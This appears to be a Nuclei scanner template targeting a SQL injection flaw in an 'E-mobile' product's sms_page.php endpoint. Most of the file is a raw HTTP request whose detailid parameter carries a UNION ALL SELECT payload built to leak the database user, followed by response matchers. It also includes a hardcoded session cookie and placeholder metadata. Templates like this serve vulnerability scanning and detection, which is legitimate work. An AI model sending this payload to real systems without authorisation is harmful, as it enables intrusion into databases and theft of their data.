id: sms_page_SQL
info:
  name: sms_pageSQL注入
  author: weehhd
  severity: high
  description: https://blog.csdn.net/qq_41904294/article/details/134675267
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /E-mobile/sms_page.php?detailid=123%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7e,user(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Cookie: LOGIN_LANG=cn; PHPSESSID=42b93accdd59a4001c07d646bb04ee4d
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - margin-top:5px
      - type: word
        part: header
        words:
          - HTTP/1.1 200 OK